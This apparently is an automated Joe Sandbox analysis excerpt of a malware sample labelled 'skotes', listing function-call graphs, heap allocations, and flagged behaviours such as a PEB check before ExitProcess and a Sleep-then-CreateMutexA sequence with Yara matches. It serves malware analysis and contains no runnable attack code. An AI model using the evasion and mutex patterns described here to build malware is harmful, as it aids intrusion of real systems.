12075->12076 12077 79d111 12078 79d121 12077->12078 12079 79d12a 12078->12079 12081 79d199 12078->12081 12082 79d1a7 SleepConditionVariableCS 12081->12082 12084 79d1c0 12081->12084 12082->12084 12084->12078 12088 782b10 12089 782b1a 12088->12089 12090 782b1c 12088->12090 12091 79c26a 5 API calls 12090->12091 12092 782b22 12091->12092 12093 798510 12094 79855f 12093->12094 12097 79856c 12093->12097 12099 799d00 12094->12099 12096 7985c4 12097->12096 12120 79a060 12097->12120 12100 799e31 12099->12100 12102 799d25 12099->12102 12101 799270 RtlAllocateHeap 12100->12101 12112 799d8b __cftof 12101->12112 12104 799e2c 12102->12104 12106 799d7a 12102->12106 12107 799da1 12102->12107 12103 7b6c6a RtlAllocateHeap 12111 799e3b 12103->12111 12105 782480 RtlAllocateHeap 12104->12105 12105->12100 12106->12104 12108 799d85 12106->12108 12109 79d3e2 RtlAllocateHeap 12107->12109 12107->12112 12110 79d3e2 RtlAllocateHeap 12108->12110 12109->12112 12110->12112 12113 799e6a shared_ptr 12111->12113 12114 7b6c6a RtlAllocateHeap 12111->12114 12112->12103 12115 799dfc shared_ptr __cftof 12112->12115 12113->12097 12116 799e8e 12114->12116 12115->12097 12117 799ec0 shared_ptr 12116->12117 12118 7b6c6a RtlAllocateHeap 12116->12118 12117->12097 12119 799ee6 12118->12119 12121 79a1b1 12120->12121 12124 79a083 12120->12124 12122 799270 RtlAllocateHeap 12121->12122 12133 79a0e4 __cftof 12122->12133 12123 7b6c6a RtlAllocateHeap 12132 79a1bb shared_ptr 12123->12132 12125 79a1ac 12124->12125 12126 79a0fd 12124->12126 12127 79a0d3 12124->12127 12128 782480 RtlAllocateHeap 12125->12128 12131 79d3e2 RtlAllocateHeap 12126->12131 12126->12133 12127->12125 12129 79a0de 12127->12129 12128->12121 12130 79d3e2 RtlAllocateHeap 12129->12130 12130->12133 12131->12133 12132->12097 12133->12123 12134 79a16c shared_ptr __cftof 12133->12134 12134->12097 12183 7855f0 12184 785610 12183->12184 12185 7822c0 4 API calls 12184->12185 12186 785710 std::invalid_argument::invalid_argument 12184->12186 12185->12184 12187 7843f0 12188 79bedf InitOnceExecuteOnce 12187->12188 12189 78440a 12188->12189 12190 784411 12189->12190 12191 7b6cbb 4 API calls 12189->12191 12192 784424 12191->12192 12233 783fe0 12234 784022 12233->12234 12235 78408c 12234->12235 12236 7840d2 12234->12236 12239 784035 std::invalid_argument::invalid_argument 12234->12239 12240 7835e0 12235->12240 12237 783ee0 4 API calls 12236->12237 12237->12239 12241 79d3e2 RtlAllocateHeap 12240->12241 12242 783616 12241->12242 12246 78364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 12242->12246 12247 782ce0 12242->12247 12244 78369e 12245 782c00 4 API calls 12244->12245 12244->12246 12245->12246 12246->12239 12248 782d1d 12247->12248 12249 79bedf InitOnceExecuteOnce 12248->12249 12250 782d46 12249->12250 12251 782d51 std::invalid_argument::invalid_argument 12250->12251 12253 782d88 12250->12253 12256 79bef7 12250->12256 12251->12244 12254 782440 4 API calls 12253->12254 12255 782d9b 12254->12255 12255->12244 12257 79bf03 12256->12257 12265 782900 12257->12265 12259 79bf23 Concurrency::cancel_current_task 12260 79bf6a 12259->12260 12261 79bf73 12259->12261 12275 79be7f 12260->12275 12263 782ae0 5 API calls 12261->12263 12264 79bf6f 12263->12264 12264->12253 12266 7980c0 RtlAllocateHeap 12265->12266 12267 78294f 12266->12267 12268 7826b0 RtlAllocateHeap 12267->12268 12270 782967 12268->12270 12269 78298d shared_ptr 12269->12259 12270->12269 12271 7b6c6a RtlAllocateHeap 12270->12271 12272 7829b6 12271->12272 12273 7b38af ___std_exception_copy RtlAllocateHeap 12272->12273 12274 7829e4 12273->12274 12274->12259 12276 79cc31 InitOnceExecuteOnce 12275->12276 12277 79be97 12276->12277 12278 79be9e 12277->12278 12279 7b6cbb 4 API calls 12277->12279 12278->12264 12280 79bea7 12279->12280 12280->12264 12281 7985e0 12282 7985f6 12281->12282 12282->12282 12283 79860b 12282->12283 12284 798f40 RtlAllocateHeap 12282->12284 12284->12283 12285 798de0 12286 798f2f 12285->12286 12287 798e05 12285->12287 12288 799270 RtlAllocateHeap 12286->12288 12291 798e4c 12287->12291 12292 798e76 12287->12292 12289 798f34 12288->12289 12290 782480 RtlAllocateHeap 12289->12290 12298 798e5d __cftof 12290->12298 12291->12289 12293 798e57 12291->12293 12296 79d3e2 RtlAllocateHeap 12292->12296 12292->12298 12295 79d3e2 RtlAllocateHeap 12293->12295 12294 7b6c6a RtlAllocateHeap 12297 798f3e 12294->12297 12295->12298 12296->12298 12298->12294 12299 798eed shared_ptr __cftof 12298->12299 12300 7887d0 12301 7888d3 12300->12301 12309 788819 shared_ptr 12300->12309 12302 7980c0 RtlAllocateHeap 12301->12302 12308 788923 12302->12308 12303 78896c 12306 798200 RtlAllocateHeap 12303->12306 12304 788949 shared_ptr 12305 7980c0 RtlAllocateHeap 12305->12309 12307 788971 12306->12307 12308->12304 12310 7b6c6a RtlAllocateHeap 12308->12310 12309->12301 12309->12303 12309->12305 12309->12308 12310->12303 9727 7ba7c8 9728 7ba7d2 __dosmaperr 9727->9728 9730 7ba7eb 9728->9730 9738 7bd82f 9728->9738 9731 7ba813 __dosmaperr 9732 7ba853 9731->9732 9733 7ba81b __dosmaperr 9731->9733 9746 7ba49f 9732->9746 9742 7badf5 9733->9742 9737 7badf5 __freea RtlAllocateHeap 9737->9730 9739 7bd83c __dosmaperr 9738->9739 9740 7bd867 RtlAllocateHeap 9739->9740 9741 7bd87a __dosmaperr 9739->9741 9740->9739 9740->9741 9741->9731 9743 7bae00 9742->9743 9745 7bae1b __dosmaperr 9742->9745 9743->9745 9750 7b75f6 9743->9750 9745->9730 9747 7ba50d __dosmaperr 9746->9747 9764 7ba445 9747->9764 9749 7ba536 9749->9737 9753 7ba7c8 9750->9753 9754 7ba7d2 __dosmaperr 9753->9754 9755 7bd82f __dosmaperr RtlAllocateHeap 9754->9755 9756 7b75fb 9754->9756 9757 7ba813 __dosmaperr 9755->9757 9756->9745 9758 7ba853 9757->9758 9759 7ba81b __dosmaperr 9757->9759 9761 7ba49f __dosmaperr RtlAllocateHeap 9758->9761 9760 7badf5 __freea RtlAllocateHeap 9759->9760 9760->9756 9762 7ba85e 9761->9762 9763 7badf5 __freea RtlAllocateHeap 9762->9763 9763->9756 9765 7ba451 __dosmaperr 9764->9765 9768 7ba626 9765->9768 9767 7ba473 __dosmaperr 9767->9749 9769 7ba635 __dosmaperr 9768->9769 9771 7ba65c __dosmaperr 9768->9771 9769->9771 9772 7bf35f 9769->9772 9771->9767 9774 7bf3df 9772->9774 9775 7bf375 9772->9775 9776 7badf5 __freea RtlAllocateHeap 9774->9776 9798 7bf42d 9774->9798 9775->9774 9780 7badf5 __freea RtlAllocateHeap 9775->9780 9782 7bf3a8 9775->9782 9777 7bf401 9776->9777 9778 7badf5 __freea RtlAllocateHeap 9777->9778 9783 7bf414 9778->9783 9779 7badf5 __freea RtlAllocateHeap 9784 7bf3d4 9779->9784 9786 7bf39d 9780->9786 9781 7bf43b 9785 7bf49b 9781->9785 9799 7badf5 RtlAllocateHeap __freea 9781->9799 9787 7badf5 __freea RtlAllocateHeap 9782->9787 9797 7bf3ca 9782->9797 9788 7badf5 __freea RtlAllocateHeap 9783->9788 9791 7badf5 __freea RtlAllocateHeap 9784->9791 9792 7badf5 __freea RtlAllocateHeap 9785->9792 9800 7bef3c 9786->9800 9789 7bf3bf 9787->9789 9790 7bf422 9788->9790 9828 7bf03a 9789->9828 9795 7badf5 __freea RtlAllocateHeap 9790->9795 9791->9774 9796 7bf4a1 9792->9796 9795->9798 9796->9771 9797->9779 9840 7bf4d0 9798->9840 9799->9781 9801 7bef4d 9800->9801 9802 7bf036 9800->9802 9803 7bef5e 9801->9803 9804 7badf5 __freea RtlAllocateHeap 9801->9804 9802->9782 9805 7bef70 9803->9805 9806 7badf5 __freea RtlAllocateHeap 9803->9806 9804->9803 9807 7bef82 9805->9807 9808 7badf5 __freea RtlAllocateHeap 9805->9808 9806->9805 9809 7bef94 9807->9809 9811 7badf5 __freea RtlAllocateHeap 9807->9811 9808->9807 9810 7befa6 9809->9810 9812 7badf5 __freea RtlAllocateHeap 9809->9812 9813 7befb8 9810->9813 9814 7badf5 __freea RtlAllocateHeap 9810->9814 9811->9809 9812->9810 9815 7befca 9813->9815 9816 7badf5 __freea RtlAllocateHeap 9813->9816 9814->9813 9817 7befdc 9815->9817 9819 7badf5 __freea RtlAllocateHeap 9815->9819 9816->9815 9818 7befee 9817->9818 9820 7badf5 __freea RtlAllocateHeap 9817->9820 9821 7bf000 9818->9821 9822 7badf5 __freea RtlAllocateHeap 9818->9822 9819->9817 9820->9818 9823 7bf012 9821->9823 9824 7badf5 __freea RtlAllocateHeap 9821->9824 9822->9821 9825 7bf024 9823->9825 9826 7badf5 __freea RtlAllocateHeap 9823->9826 9824->9823 9825->9802 9827 7badf5 __freea RtlAllocateHeap 9825->9827 9826->9825 9827->9802 9829 7bf047 9828->9829 9839 7bf09f 9828->9839 9830 7bf057 9829->9830 9831 7badf5 __freea RtlAllocateHeap 9829->9831 9832 7badf5 __freea RtlAllocateHeap 9830->9832 9833 7bf069 9830->9833 9831->9830 9832->9833 9834 7badf5 __freea RtlAllocateHeap 9833->9834 9836 7bf07b 9833->9836 9834->9836 9835 7bf08d 9838 7badf5 __freea RtlAllocateHeap 9835->9838 9835->9839 9836->9835 9837 7badf5 __freea RtlAllocateHeap 9836->9837 9837->9835 9838->9839 9839->9797 9841 7bf4fc 9840->9841 9842 7bf4dd 9840->9842 9841->9781 9842->9841 9846 7bf0db 9842->9846 9845 7badf5 __freea RtlAllocateHeap 9845->9841 9847 7bf1b9 9846->9847 9848 7bf0ec 9846->9848 9847->9845 9882 7bf0a3 9848->9882 9851 7bf0a3 __dosmaperr RtlAllocateHeap 9852 7bf0ff 9851->9852 9853 7bf0a3 __dosmaperr RtlAllocateHeap 9852->9853 9854 7bf10a 9853->9854 9855 7bf0a3 __dosmaperr RtlAllocateHeap 9854->9855 9856 7bf115 9855->9856 9857 7bf0a3 __dosmaperr RtlAllocateHeap 9856->9857 9858 7bf123 9857->9858 9859 7badf5 __freea RtlAllocateHeap 9858->9859 9860 7bf12e 9859->9860 9861 7badf5 __freea RtlAllocateHeap 9860->9861 9862 7bf139 9861->9862 9863 7badf5 __freea RtlAllocateHeap 9862->9863 9864 7bf144 9863->9864 9865 7bf0a3 __dosmaperr RtlAllocateHeap 9864->9865 9866 7bf152 9865->9866 9867 7bf0a3 __dosmaperr RtlAllocateHeap 9866->9867 9868 7bf160 9867->9868 9869 7bf0a3 __dosmaperr RtlAllocateHeap 9868->9869 9870 7bf171 9869->9870 9871 7bf0a3 __dosmaperr RtlAllocateHeap 9870->9871 9872 7bf17f 9871->9872 9873 7bf0a3 __dosmaperr RtlAllocateHeap 9872->9873 9874 7bf18d 9873->9874 9875 7badf5 __freea RtlAllocateHeap 9874->9875 9876 7bf198 9875->9876 9877 7badf5 __freea RtlAllocateHeap 9876->9877 9878 7bf1a3 9877->9878 9879 7badf5 __freea RtlAllocateHeap 9878->9879 9880 7bf1ae 9879->9880 9881 7badf5 __freea RtlAllocateHeap 9880->9881 9881->9847 9883 7bf0d6 9882->9883 9885 7bf0c6 9882->9885 9883->9851 9884 7badf5 __freea RtlAllocateHeap 9884->9885 9885->9883 9885->9884 12349 7821c0 12350 7821cb 12349->12350 12351 7821d0 12349->12351 12352 7821d4 12351->12352 12356 7821ec __cftof 12351->12356 12353 7b75f6 __dosmaperr RtlAllocateHeap 12352->12353 12355 7821d9 12353->12355 12354 7821fc __cftof 12357 7b6c5a __cftof RtlAllocateHeap 12355->12357 12356->12354 12358 78223a 12356->12358 12359 782221 12356->12359 12360 7821e4 12357->12360 12362 782231 12358->12362 12364 7b75f6 __dosmaperr RtlAllocateHeap 12358->12364 12361 7b75f6 __dosmaperr RtlAllocateHeap 12359->12361 12363 782226 12361->12363 12366 7b6c5a __cftof RtlAllocateHeap 12363->12366 12365 782247 12364->12365 12367 7b6c5a __cftof RtlAllocateHeap 12365->12367 12366->12362 12368 782252 12367->12368 12374 7979c0 12375 7979e0 12374->12375 12375->12375 12376 7980c0 RtlAllocateHeap 12375->12376 12377 7979f2 12376->12377 12378 7983c0 12379 797760 RtlAllocateHeap 12378->12379 12380 798439 12379->12380 12381 798f40 RtlAllocateHeap 12380->12381 12382 798454 12380->12382 12381->12382 12383 798f40 RtlAllocateHeap 12382->12383 12385 7984a8 12382->12385 12384 7984ee 12383->12384 12390 7b8bbe 12391 7b8868 4 API calls 12390->12391 12392 7b8bdc 12391->12392 12397 78b7b1 12398 78b7be 12397->12398 12399 797a00 RtlAllocateHeap 12398->12399 12400 78b7f3 12399->12400 12401 797a00 RtlAllocateHeap 12400->12401 12402 78b80b 12401->12402 12403 797a00 RtlAllocateHeap 12402->12403 12404 78b823 12403->12404 12405 797a00 RtlAllocateHeap 12404->12405 12406 78b835 12405->12406 12407 7b67b7 12408 7b67c3 __dosmaperr 12407->12408 12409 7b67cd 12408->12409 12412 7b67e2 12408->12412 12410 7b75f6 __dosmaperr RtlAllocateHeap 12409->12410 12411 7b67d2 12410->12411 12413 7b6c5a __cftof RtlAllocateHeap 12411->12413 12415 7b67dd 12412->12415 12416 7b6740 12412->12416 12413->12415 12417 7b674d 12416->12417 12418 7b6762 12416->12418 12419 7b75f6 __dosmaperr RtlAllocateHeap 12417->12419 12424 7b675d 12418->12424 12432 7ba038 12418->12432 12420 7b6752 12419->12420 12422 7b6c5a __cftof RtlAllocateHeap 12420->12422 12422->12424 12424->12415 12428 7b6785 12449 7baebb 12428->12449 12431 7badf5 __freea RtlAllocateHeap 12431->12424 12433 7ba050 12432->12433 12437 7b6777 12432->12437 12434 7bafe4 RtlAllocateHeap 12433->12434 12433->12437 12435 7ba06e 12434->12435 12464 7c0439 12435->12464 12438 7bb00b 12437->12438 12439 7bb022 12438->12439 12440 7b677f 12438->12440 12439->12440 12441 7badf5 __freea RtlAllocateHeap 12439->12441 12442 7bafe4 12440->12442 12441->12440 12443 7baff0 12442->12443 12444 7bb005 12442->12444 12445 7b75f6 __dosmaperr RtlAllocateHeap 12443->12445 12444->12428 12446 7baff5 12445->12446 12447 7b6c5a __cftof RtlAllocateHeap 12446->12447 12448 7bb000 12447->12448 12448->12428 12450 7baecc 12449->12450 12451 7baee1 12449->12451 12452 7b75e3 __dosmaperr RtlAllocateHeap 12450->12452 12453 7baf2a 12451->12453 12456 7baf08 12451->12456 12455 7baed1 12452->12455 12454 7b75e3 __dosmaperr RtlAllocateHeap 12453->12454 12457 7baf2f 12454->12457 12458 7b75f6 __dosmaperr RtlAllocateHeap 12455->12458 12482 7bae2f 12456->12482 12460 7b75f6 __dosmaperr RtlAllocateHeap 12457->12460 12462 7b678b 12458->12462 12461 7baf37 12460->12461 12463 7b6c5a __cftof RtlAllocateHeap 12461->12463 12462->12424 12462->12431 12463->12462 12465 7c0445 __dosmaperr 12464->12465 12466 7c044d 12465->12466 12467 7c0465 12465->12467 12468 7b75e3 __dosmaperr RtlAllocateHeap 12466->12468 12469 7c0500 12467->12469 12476 7c0497 12467->12476 12470 7c0452 12468->12470 12471 7b75e3 __dosmaperr RtlAllocateHeap 12469->12471 12472 7b75f6 __dosmaperr RtlAllocateHeap 12470->12472 12473 7c0505 12471->12473 12481 7c045a 12472->12481 12474 7b75f6 __dosmaperr RtlAllocateHeap 12473->12474 12475 7c050d 12474->12475 12477 7b6c5a __cftof RtlAllocateHeap 12475->12477 12478 7b75f6 __dosmaperr RtlAllocateHeap 12476->12478 12476->12481 12477->12481 12479 7c04be 12478->12479 12480 7b75e3 __dosmaperr RtlAllocateHeap 12479->12480 12480->12481 12481->12437 12483 7bae3b __dosmaperr 12482->12483 12484 7bae7b 12483->12484 12485 7bae70 12483->12485 12487 7b75f6 __dosmaperr RtlAllocateHeap 12484->12487 12489 7baf48 12485->12489 12488 7bae76 12487->12488 12488->12462 12500 7bc0de 12489->12500 12491 7baf58 12492 7baf90 12491->12492 12494 7bc0de RtlAllocateHeap 12491->12494 12496 7baf5e 12491->12496 12493 7bc0de RtlAllocateHeap 12492->12493 12492->12496 12493->12496 12495 7baf87 12494->12495 12498 7bc0de RtlAllocateHeap 12495->12498 12497 7bafd8 12496->12497 12499 7b75c0 __dosmaperr RtlAllocateHeap 12496->12499 12497->12488 12498->12492 12499->12497 12501 7bc0eb 12500->12501 12502 7bc100 12500->12502 12503 7b75e3 __dosmaperr RtlAllocateHeap 12501->12503 12504 7b75e3 __dosmaperr RtlAllocateHeap 12502->12504 12506 7bc125 12502->12506 12505 7bc0f0 12503->12505 12507 7bc130 12504->12507 12508 7b75f6 __dosmaperr RtlAllocateHeap 12505->12508 12506->12491 12510 7b75f6 __dosmaperr RtlAllocateHeap 12507->12510 12509 7bc0f8 12508->12509 12509->12491 12511 7bc138 12510->12511 12512 7b6c5a __cftof RtlAllocateHeap 12511->12512 12512->12509 12513 786db5 12514 786dc2 12513->12514 12515 786dca 12514->12515 12516 786df5 12514->12516 12517 7980c0 RtlAllocateHeap 12515->12517 12518 7980c0 RtlAllocateHeap 12516->12518 12519 786deb shared_ptr 12517->12519 12518->12519 12520 786ec1 shared_ptr 12519->12520 12521 7b6c6a RtlAllocateHeap 12519->12521 12522 786ee3 12521->12522 12572 789ba5 12573 789ba7 12572->12573 12574 797a00 RtlAllocateHeap 12573->12574 12575 789ca9 12574->12575 12576 785c10 4 API calls 12575->12576 12577 789cb1 12576->12577 12578 788b30 4 API calls 12577->12578 12579 789cc2 12578->12579 12580 798220 RtlAllocateHeap 12579->12580 12581 789cd1 12580->12581 12582 783f9f 12583 783fad 12582->12583 12587 783fc5 12582->12587 12584 782410 5 API calls 12583->12584 12585 783fb6 12584->12585 12586 783ce0 RtlAllocateHeap 12585->12586 12586->12587 12591 782b90 12592 782bce 12591->12592 12593 79b7fb TpReleaseWork 12592->12593 12594 782bdb shared_ptr std::invalid_argument::invalid_argument 12593->12594 12610 788980 12611 788aea 12610->12611 12618 7889d8 shared_ptr 12610->12618 12612 797a00 RtlAllocateHeap 12612->12618 12613 785c10 4 API calls 12613->12618 12614 788b20 12616 798200 RtlAllocateHeap 12614->12616 12615 7980c0 RtlAllocateHeap 12615->12618 12617 788b25 12616->12617 12619 7b6c6a RtlAllocateHeap 12617->12619 12618->12611 12618->12612 12618->12613 12618->12614 12618->12615 12618->12617 12620 788b2a 12619->12620

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 367 7b652b-7b6538 call 7ba302 370 7b655a-7b656c call 7b656d ExitProcess 367->370 371 7b653a-7b6548 GetPEB 367->371 371->370 373 7b654a-7b6559 371->373 373->370
                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,007B652A,?,?,?,?,?,007B7661), ref: 007B6567
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5b16228ced527161ca9bf63de6270444d0520dd7dcad59064328e8bee2275421
                                                                                                                • Instruction ID: c4c7f5eb229261c857f0cfc4e48fcf964375b68845458a552cc207850aecbf09
                                                                                                                • Opcode Fuzzy Hash: 5b16228ced527161ca9bf63de6270444d0520dd7dcad59064328e8bee2275421
                                                                                                                • Instruction Fuzzy Hash: 5BE08C30041208AECF36BB18D85EBCC3B69EF12741F000810FE1886226CB2DEEA1CA80

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.2396880013.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2396944563.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397123846.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397331895.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397514180.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397947916.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2397988014.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398032734.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398142893.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398190826.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398231809.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398277697.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398321382.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398363512.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398404782.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398447127.00000000009AD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398495440.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398543218.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398622879.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398662924.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398702660.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398740514.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398777283.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398820809.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398861976.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398906103.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398946612.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2398989055.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399029067.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399053614.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399111594.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399154613.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399257971.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399291114.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399334195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399370416.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.2399423576.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
